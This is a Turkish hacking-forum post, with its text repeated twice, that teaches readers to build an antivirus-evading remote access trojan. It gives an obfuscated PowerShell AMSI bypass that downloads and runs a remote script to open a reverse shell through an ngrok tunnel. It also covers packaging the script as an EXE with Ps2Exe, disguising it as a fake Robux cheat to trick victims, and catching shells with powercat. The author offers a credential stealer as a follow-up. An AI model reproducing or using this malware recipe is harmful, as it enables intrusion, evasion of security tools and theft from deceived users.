Türkiye'nin en güncel forumlardan olan forumdas.com.tr'de forumda aktif ve katkısı olabilecek kişilerden gönüllü katkıda sağlayabilecek kişiler aranmaktadır.
karakorsan3162
FD Üye
merhaba forum üyeleri (Yazıyı yazmak sandığımdan daha da uzun sürdü
mazur görün)
Discord: ahmedildo_
size kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)
img:
1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz
img:
2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp
img:
3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.
img:
Artık Ngrok Hazır!
Sırada bir bağlantı açmak var.
4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.
img:
5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak
img:
Buradaki isteğim sizden tcp:// hariç
6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz
Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('
Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu
ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.
6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama linkini aşşağıya salıyorum ama benim linkimden de indirmeyebilirsiniz tamamiyle size kalmış ben olsam google amcadan güvenli kaynak arardım çünkü rastgele bir yerden indirip koydum (herşeyi ben yapamam maalesef
)
bu linkten indirip açabilirsiniz
kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!
img:
bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.
7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır
bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.
bu durumda kullanacağımız komut
"powercat -l -p 8000 "
ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.
İŞTE SONUÇ
derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.
aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.
kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)
İYİ RATLAMALAR
Discord: ahmedildo_
size kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
Artık Ngrok Hazır!
Sırada bir bağlantı açmak var.
4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
Buradaki isteğim sizden tcp:// hariç
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz
Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
-c ngrok_host -p ngrok_port-e cmdBu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu
ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.
6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama linkini aşşağıya salıyorum ama benim linkimden de indirmeyebilirsiniz tamamiyle size kalmış ben olsam google amcadan güvenli kaynak arardım çünkü rastgele bir yerden indirip koydum (herşeyi ben yapamam maalesef
bu linkten indirip açabilirsiniz
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!
img:
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.
7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır
bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.
bu durumda kullanacağımız komut
"powercat -l -p 8000 "
ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.
İŞTE SONUÇ
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
Ziyaretçiler için gizlenmiş link , görmek için
Giriş yap veya üye ol.
derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.
aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.
kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)
İYİ RATLAMALAR
